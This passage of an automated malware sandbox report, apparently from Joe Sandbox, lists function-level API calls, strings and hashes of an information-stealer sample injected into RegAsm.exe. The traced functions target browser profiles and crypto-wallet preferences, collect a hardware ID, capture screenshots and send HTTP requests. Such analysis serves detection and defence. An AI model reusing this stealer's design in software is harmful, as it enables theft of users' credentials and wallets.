Function 008DA08D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 008DA0B2

Strings

MOC, xrefs: 008DA0C4
RCC, xrefs: 008DA0CC

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: bdcc95b557f04a46074f2eaf8c4e20adbf27a3cd7eb7f759680e337bcf49fb04
Instruction ID: abfcc034f2f85b2d351f47ce5ef31000f8a6fe723e0fb6694204e707ceca4fae
Opcode Fuzzy Hash: bdcc95b557f04a46074f2eaf8c4e20adbf27a3cd7eb7f759680e337bcf49fb04
Instruction Fuzzy Hash: 6A415872900209AFCF19DF98CC81AEEBBB5FF48300F24825AFA05B7221D7359951DB52

Uniqueness

Uniqueness Score: -1.00%

Function 008D208F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008D2096
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 008D20CE

Part of subcall function 008D4A33: _Yarn.LIBCPMT ref: 008D4A52
Part of subcall function 008D4A33: _Yarn.LIBCPMT ref: 008D4A76

Strings

bad locale name, xrefs: 008D20DC

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 8a9bda9dcc9110f5ad385722eb233487703e95a1e41bb1c0be3d5c5b32eeb4d7
Instruction ID: bda2efe3df6e17d126057a4a9135e17eaccfe07441a47733fa3e0cd5b6a0f4f1
Opcode Fuzzy Hash: 8a9bda9dcc9110f5ad385722eb233487703e95a1e41bb1c0be3d5c5b32eeb4d7
Instruction Fuzzy Hash: 28F0F47154AB409F83309F6A9481447FBE4FE293203949A2FE19EC3B11D730A444CBAA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 7344, Parent PID: 7264COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	1.4%
Signature Coverage:	9.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	36

Executed Functions

Function 00418970 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 208
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,0041887A), ref: 00418975
GetProcAddress.KERNEL32(00000000,012AF2E8), ref: 00418990
GetProcAddress.KERNEL32(74DD0000,012AF360), ref: 004189BD
GetProcAddress.KERNEL32(74DD0000,012AF1C8), ref: 004189D6
GetProcAddress.KERNEL32(74DD0000,012AF1E0), ref: 004189EE
GetProcAddress.KERNEL32(74DD0000,012AF4B0), ref: 00418A06
GetProcAddress.KERNEL32(74DD0000,012B2DC0), ref: 00418A1F
GetProcAddress.KERNEL32(74DD0000,012B2A80), ref: 00418A37
GetProcAddress.KERNEL32(74DD0000,012B2A20), ref: 00418A4F
GetProcAddress.KERNEL32(74DD0000,012AF4C8), ref: 00418A68
GetProcAddress.KERNEL32(74DD0000,012AF4E0), ref: 00418A80
GetProcAddress.KERNEL32(74DD0000,012AF528), ref: 00418A98
GetProcAddress.KERNEL32(74DD0000,012AF4F8), ref: 00418AB1
GetProcAddress.KERNEL32(74DD0000,012B2B60), ref: 00418AC9
GetProcAddress.KERNEL32(74DD0000,012AF510), ref: 00418AE1
GetProcAddress.KERNEL32(74DD0000,012AF480), ref: 00418AFA
GetProcAddress.KERNEL32(74DD0000,012B2B00), ref: 00418B12
GetProcAddress.KERNEL32(74DD0000,012AF540), ref: 00418B2A
GetProcAddress.KERNEL32(74DD0000,012AF498), ref: 00418B43
GetProcAddress.KERNEL32(74DD0000,012B2C40), ref: 00418B5B
GetProcAddress.KERNEL32(74DD0000,012ACA10), ref: 00418B73
GetProcAddress.KERNEL32(74DD0000,012B2B40), ref: 00418B8C
LoadLibraryA.KERNEL32(012BDF30), ref: 00418B9D
LoadLibraryA.KERNEL32(012BDDB0), ref: 00418BAF
LoadLibraryA.KERNEL32(012BDDF8), ref: 00418BC1
LoadLibraryA.KERNEL32(012BDF78), ref: 00418BD2
LoadLibraryA.KERNEL32(012BDDE0), ref: 00418BE4
GetProcAddress.KERNEL32(75A70000,012BDEA0), ref: 00418C00
GetProcAddress.KERNEL32(75290000,012BDE28), ref: 00418C1C
GetProcAddress.KERNEL32(75290000,012BDDC8), ref: 00418C34
GetProcAddress.KERNEL32(75BD0000,012BDD80), ref: 00418C50
GetProcAddress.KERNEL32(75450000,012B2B80), ref: 00418C6C
GetProcAddress.KERNEL32(76E90000,012B2F10), ref: 00418C88
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00418C9F

Strings

NtQueryInformationProcess, xrefs: 00418C94
kernel32.dll, xrefs: 00418970

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess$kernel32.dll
API String ID: 2238633743-258108907
Opcode ID: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
Instruction ID: 54f81618b0003c9a7d9cd87b1105554b9cb69cd8690f86f09dc99c509db4cf5f
Opcode Fuzzy Hash: d3dc7f79465fd81c2f6d2aeca6bccb15f19688e2caa800e74057db0e9ec5c149
Instruction Fuzzy Hash: 3D9134BDA002029FD744DFA4EC6896637FBF78EB413A06519FA05C7360EB349885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00416740 Relevance: 49.3, APIs: 23, Strings: 5, Instructions: 334
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0041677A
FindFirstFileA.KERNEL32(?,?,?,00416D98,00416EE5), ref: 00416791
memset.MSVCRT ref: 004167A9
memset.MSVCRT ref: 004167BB
StrCmpCA.SHLWAPI(?,00428648,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041680C
StrCmpCA.SHLWAPI(?,0042864C,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 00416826
wsprintfA.USER32 ref: 0041684B
StrCmpCA.SHLWAPI(?,0042835F,?,?,?,?,?,?,?,?,?,?,?,00416D98,00416EE5), ref: 0041685D
wsprintfA.USER32 ref: 00416885
memset.MSVCRT ref: 004168BD
lstrcat.KERNEL32(?,?), ref: 004168D0
strtok_s.MSVCRT ref: 004168E6
strtok_s.MSVCRT ref: 00416913
memset.MSVCRT ref: 0041692C
lstrcat.KERNEL32(?,?), ref: 0041693C
strtok_s.MSVCRT ref: 00416952
PathMatchSpecA.SHLWAPI(?,00000000), ref: 0041696A

Strings

%s\%s, xrefs: 00416845
%s\%s, xrefs: 004168A1
%s\*.*, xrefs: 0041676F
%s\%s\%s, xrefs: 0041687F
%s%s, xrefs: 004169A3

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 1425701045-3225784412
Opcode ID: 8626fca86b05ac8aaf2817f9b7a50739662535e5c9a0d08921c2eb99929d4ad6
Instruction ID: 9df80aab3b2c67129cd77f9efb50d4b945a18d7e013ca70540632bd8ef74930f
Opcode Fuzzy Hash: 8626fca86b05ac8aaf2817f9b7a50739662535e5c9a0d08921c2eb99929d4ad6
Instruction Fuzzy Hash: 16C1DAB5900209ABCB14DFA4DC85EEE77B8EF49704F50855EF505A3281DB389E88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4F0 Relevance: 42.9, APIs: 18, Strings: 6, Instructions: 913
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,?,00427A9B,00427A9A,00000000,?,00427BDC,?,?,00427A97,?,00000000,00000005), ref: 0040D5A4
StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636
StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7

Strings

Brave, xrefs: 0040D8DF
Preferences, xrefs: 0040D8FE
Opera GX, xrefs: 0040D6D6
Google Chrome, xrefs: 0040DE2B
F, xrefs: 0040E179
\BraveWallet\Preferences, xrefs: 0040D9E4

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Brave$F$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 2567437900-1653842991
Opcode ID: 8653c93725c62dc33c7048253eaf4a61a78e75d13c9aba3aba8e6bba28a6e15d
Instruction ID: 52dee1824ab0a65af1c6b66960748f4e36746aede80700b1bdbde72769120ff5
Opcode Fuzzy Hash: 8653c93725c62dc33c7048253eaf4a61a78e75d13c9aba3aba8e6bba28a6e15d
Instruction Fuzzy Hash: 32829370900248EADB15EBA5C955BDDBBB86F19304F1040AEF945B32C2DF781B4CCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00404490 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 537
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,00000000), ref: 0040457A

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404704
HttpOpenRequestA.WININET(00000000,012BF810,?,012C3470,00000000,00000000,-00400100,00000000), ref: 00404745
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040476B

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

lstrlen.KERNEL32(00000000,00000000,004201A9,?,?,?,00427895,00000000,004201A9,?,00000000,004201A9,",00000000,004201A9,build_id), ref: 00404A3A
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404A53
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404A64
InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404A7B
InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404ACF
InternetCloseHandle.WININET(00000000), ref: 00404ADA
InternetCloseHandle.WININET(?), ref: 00404AEF
InternetCloseHandle.WININET(00000000), ref: 00404AF9

Strings

", xrefs: 0040483F
!, xrefs: 00404AB5
build_id, xrefs: 0040495E
", xrefs: 00404987
hwid, xrefs: 00404816
------, xrefs: 004045FF
------, xrefs: 00404771
------, xrefs: 004048B9

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
String ID: !$"$"$------$------$------$build_id$hwid
API String ID: 1585128682-3346224549
Opcode ID: ee956d695974c9b5f59e4f9e12a161d67f1cde6b0e86407fe14457c4f0616a06
Instruction ID: 05938b0e318a003ddb6cc0cd5bccca28d8fa4bc8ac54279827d029eeae647f4c
Opcode Fuzzy Hash: ee956d695974c9b5f59e4f9e12a161d67f1cde6b0e86407fe14457c4f0616a06
Instruction Fuzzy Hash: 76223F71805149EADB15E7E5C952BEEBBB8AF19304F2440AEF50173182DE782B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 00417800 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00417838
FindFirstFileA.KERNEL32(?,?), ref: 0041784F
StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
wsprintfA.USER32 ref: 004178DB
StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
wsprintfA.USER32 ref: 00417907
PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
lstrcat.KERNEL32(?,012BF680), ref: 00417963
lstrcat.KERNEL32(?,00428720), ref: 00417975
lstrcat.KERNEL32(?,?), ref: 00417983
lstrcat.KERNEL32(?,00428724), ref: 00417995
lstrcat.KERNEL32(?,?), ref: 004179A9

Strings

%s\%s, xrefs: 00417920
%s\%s, xrefs: 004178D5
%s\*, xrefs: 0041782B

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3088078853-445461498
Opcode ID: dd4b5552ebb8a200a6500d3c24df88273e523bdc8c19d81b619127e0f4875644
Instruction ID: 98b5a54622b645726d4fda38e5423e71ee503b351a3d596aa25196b1fd800074
Opcode Fuzzy Hash: dd4b5552ebb8a200a6500d3c24df88273e523bdc8c19d81b619127e0f4875644
Instruction Fuzzy Hash: ED81C475900219ABCB10EFA1DC85BEE77B9BF49704F50459EFA09A3181DB385B48CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004110A0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 166
memorycomtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
VariantInit.OLEAUT32(?), ref: 00411186

Part of subcall function 00410FF0: CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
Part of subcall function 00410FF0: SysAllocString.OLEAUT32(?), ref: 0041101C
Part of subcall function 00410FF0: _wtoi64.MSVCRT ref: 00411062
Part of subcall function 00410FF0: SysFreeString.OLEAUT32(?), ref: 00411078
Part of subcall function 00410FF0: SysFreeString.OLEAUT32(00000000), ref: 0041107B

FileTimeToSystemTime.KERNEL32(0042840C,?,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111C0
GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111CC
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4), ref: 004111D3
VariantClear.OLEAUT32(?), ref: 00411217
wsprintfA.USER32 ref: 004111FF

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

%d/%d/%d %d:%d:%d, xrefs: 004111F9
ROOT\CIMV2, xrefs: 00411106
InstallDate, xrefs: 0041119B
WQL, xrefs: 00411144
Select * From Win32_OperatingSystem, xrefs: 00411137
Unknown, xrefs: 00411235
Unknown, xrefs: 0041122E

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
API String ID: 1611285705-2016369993
Opcode ID: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
Instruction ID: 2f8da4572961598b54827d09d40e8d86347dea92272749ef862c40ce3fce3f1e
Opcode Fuzzy Hash: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
Instruction Fuzzy Hash: 31517C71A01229ABCB24DB95DC49EFFBB7CEF49B10F10411AF605A3290D7789942CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411DF0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 212windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411E2B
GetDesktopWindow.USER32 ref: 00411EC2
GetWindowRect.USER32(00000000,?), ref: 00411ECF
GetDC.USER32(00000000), ref: 00411ED6
CreateCompatibleDC.GDI32(00000000), ref: 00411EDF
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411EF0
SelectObject.GDI32(00000000,00000000), ref: 00411EFB
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411F1B
GlobalFix.KERNEL32(000000FF), ref: 00411F81
GlobalSize.KERNEL32(000000FF), ref: 00411F8E

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00404DD0: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56
Part of subcall function 00404DD0: StrCmpCA.SHLWAPI(?,012BF690,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
Part of subcall function 00404DD0: InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07

SelectObject.GDI32(00000000,?), ref: 0041200D
DeleteObject.GDI32(00000000), ref: 0041202B
DeleteObject.GDI32(00000000), ref: 00412032
ReleaseDC.USER32(00000000,00000000), ref: 0041203A
CloseWindow.USER32(00000000), ref: 00412041

Strings

image/jpeg, xrefs: 00411F3D

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
String ID: image/jpeg
API String ID: 2262162031-3785015651
Opcode ID: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
Instruction ID: 2d4e664fba7b2a05d5ee53653e52332fc25948be14a74fdae1dc0a0959ef4bc3
Opcode Fuzzy Hash: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
Instruction Fuzzy Hash: F48170B5900209EFDB14DFA4DD45BEEBBB9EF4A704F10412EFA05A3290DB385905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00416F50 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 161stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416F8B
FindFirstFileA.KERNEL32(?,?), ref: 00416FA2
StrCmpCA.SHLWAPI(?,004286D4), ref: 00416FDF
StrCmpCA.SHLWAPI(?,004286D8), ref: 00416FF9
lstrcat.KERNEL32(?,012BF680), ref: 00417037
lstrcat.KERNEL32(?,012BF7F0), ref: 0041704B
lstrcat.KERNEL32(?,?), ref: 0041705F
lstrcat.KERNEL32(?,?), ref: 0041706D
lstrcat.KERNEL32(?,004286DC), ref: 0041707F
lstrcat.KERNEL32(?,?), ref: 00417093
FindNextFileA.KERNEL32(00000000,?), ref: 00417137

Strings

%s\%s, xrefs: 00416F7E

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

